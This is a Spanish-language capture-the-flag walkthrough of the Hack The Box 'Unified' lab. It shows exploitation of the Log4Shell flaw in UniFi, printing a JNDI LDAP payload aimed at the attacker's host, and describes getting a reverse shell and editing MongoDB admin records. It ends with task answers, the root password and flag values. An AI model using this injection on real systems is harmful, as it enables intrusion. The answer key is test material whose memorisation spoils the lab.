Unified
1. 📝 Introducción
Nivel de Dificultad: Muy fácil.
Tags:
• Vulnerability Assessment: Evaluación sistemática para identificar y clasificar vulnerabilidades en sistemas, aplicaciones o redes.
• Databases: Repositorios estructurados de datos que pueden ser vulnerables a ataques como inyección de código o acceso no autorizado.
• Custom Applications: Aplicaciones desarrolladas a medida que pueden contener vulnerabilidades específicas no presentes en aplicaciones comerciales.
• MongoDB: Sistema de gestión de bases de datos NoSQL que puede ser vulnerable a inyecciones de código o configuraciones inseguras que expongan datos.
• Java: Lenguaje de programación que puede tener vulnerabilidades de seguridad en el código, como inyecciones, malas prácticas de gestión de memoria, entre otras.
• Reconnaissance: Proceso de recolección de información sobre un objetivo para identificar posibles puntos de ataque, mediante técnicas como el escaneo de puertos o el análisis de redes.
• Clear Text Credentials: Exposición de credenciales sin cifrado, lo que facilita su robo durante la transmisión o el almacenamiento.
• Default Credentials: Uso de credenciales por defecto en sistemas o aplicaciones, lo que puede permitir el acceso no autorizado.
• Code Injection: Inserción de código malicioso en una aplicación con el fin de manipular su comportamiento o extraer información.
2. 🛠️ Entorno
Nos descargamos nuestra VPN y nos conectamos.
Iniciamos la máquina y verificamos la conexión.
Observamos que tenemos conexión y que es una máquina Linux ya que su ttl=63.
3. 🔍 Reconocimiento
A continuación, se realiza el comando:
para realizar un escaneo de puertos y servicios detallado en la dirección IP.
4. 🚪 Acceso Inicial
Como podemos observar durante el escaneo, el puerto 22 perteneciente al servicio SSH, el puerto 6789 correspondiente a IBM DB2 Admin, el puerto 8080 relacionado con HTTP Proxy, y el puerto 8443 perteneciente a HTTPS-alt están abiertos. A continuación, se indagará más sobre estos servicios.
Nota: añadir la IP con unified.htb en el archivo /etc/hosts
Nos redirige a la página de inicio de sesión de Unifi, versión 6.4.54. Vamos a buscar en Google ese número de versión para ver si existen vulnerabilidades. Vemos que esta versión es vulnerable a la famosa vulnerabilidad de Log4j con el número de CVE CVE-2021-44228. Encontramos este artículo que será nuestra guía para explotar esta vulnerabilidad y obtener una shell reversa.
Pasos para Explotar la Vulnerabilidad
Interceptar la Solicitud de Inicio de Sesión
Primero, interceptamos una solicitud de inicio de sesión usando Burp Suite y la enviamos al Repeater.
Análisis de la Solicitud
En la solicitud POST, vemos 4 claves:
username
,password
,rememberme
ystrict
.Según el artículo, la vulnerabilidad está en el valor de
rememberme
emitido en la solicitud de inicio de sesión.
Para probar la vulnerabilidad, podemos usar tcpdump
para escuchar conexiones en el puerto 1389 en la interfaz tun0
, que es nuestra conexión VPN. Ejecuta el siguiente comando:
La carga útil que utilizaremos es la siguiente: ${jndi:ldap://10.10.16.51:1389/o=tomcat}
. Colócala en el valor de rememberme
.
Primero, necesitamos clonar el repositorio de GitHub y construir la herramienta. Ejecuta los siguientes comandos:
Necesitamos una carga útil que nos envíe una shell reversa. Utilizaremos el siguiente comando:
Luego, debemos codificar esta carga útil en base64 con el siguiente comando:
Ahora, necesitamos iniciar el servidor LDAP Rogue-JNDI con el siguiente comando. Reemplaza la cadena codificada en base64 después de echo
con la que generaste. También reemplaza el valor de --hostname
con tu dirección IP:
Enviamos un request del Repeater y nos ponemos en escucha para conectarnos.
Mejoramos la shell.
Este artículo nos ha ayudado a seguir los pasos necesarios para explotar la vulnerabilidad:Gist de AmazingTurtle: Exploitando Log4j en Unifi Este recurso proporciona una guía adicional y ejemplos sobre cómo llevar a cabo el ataque y obtener acceso no autorizado.
Creamos un hash del tipo sha-512 para un nuevo usuario.
Nos logueamos con las credenciales.
5. 🔑 Captura de la Flag
Dado que el recurso actual no está cargando, revisamos el walkthrough oficial para obtener la contraseña. Según el documento oficial, la contraseña es: NotACrackablePassword4U2022.
Obtenemos las distintas flag requeridas entre los directorios.
6. ❓Preguntas
Tarea 1: ¿Cuáles son los primeros cuatro puertos abiertos?
22, 6789, 8080, 8443 Estos son los puertos abiertos que identificamos en el escaneo de red.
Tarea 2: ¿Cuál es el título del software que se está ejecutando en el puerto 8443?
UniFi Network El software en ejecución en el puerto 8443 es UniFi Network.
Tarea 3: ¿Cuál es la versión del software que se está ejecutando?
6.4.54 La versión del software UniFi Network en ejecución es 6.4.54.
Tarea 4: ¿Cuál es el CVE para la vulnerabilidad identificada?
CVE-2021-44228 La vulnerabilidad identificada en la versión del software corresponde al CVE-2021-44228.
Tarea 5: ¿Qué protocolo utiliza JNDI en la inyección?
ldap JNDI utiliza el protocolo LDAP para la inyección.
Tarea 6: ¿Qué herramienta usamos para interceptar el tráfico, indicando que el ataque fue exitoso?
tcpdump La herramienta utilizada para interceptar el tráfico y confirmar el éxito del ataque es tcpdump.
Tarea 7: ¿En qué puerto necesitamos inspeccionar el tráfico interceptado?
389 Debemos inspeccionar el tráfico interceptado en el puerto 389.
Tarea 8: ¿En qué puerto está en funcionamiento el servicio MongoDB?
27117 El servicio MongoDB está en funcionamiento en el puerto 27117.
Tarea 9: ¿Cuál es el nombre de la base de datos por defecto para las aplicaciones UniFi?
ace La base de datos por defecto para las aplicaciones UniFi se llama ace.
Tarea 10: ¿Qué función usamos para enumerar usuarios dentro de la base de datos en MongoDB?
db.admin.find() Para enumerar usuarios dentro de la base de datos en MongoDB usamos la función db.admin.find().
Tarea 11: ¿Qué función usamos para actualizar usuarios dentro de la base de datos en MongoDB?
db.admin.update() La función utilizada para actualizar usuarios dentro de la base de datos en MongoDB es db.admin.update().
Tarea 12: ¿Cuál es la contraseña para el usuario root?
NotACrackablePassword4U2022 La contraseña para el usuario root es NotACrackablePassword4U2022.
Tarea 13: Enviar Bandera Usuario
6ced1a6a89e666c0620cdb10262ba127
Tarea 14: Enviar Bandera Root
e50bc93c75b634e4b272d2f771c33681
Last updated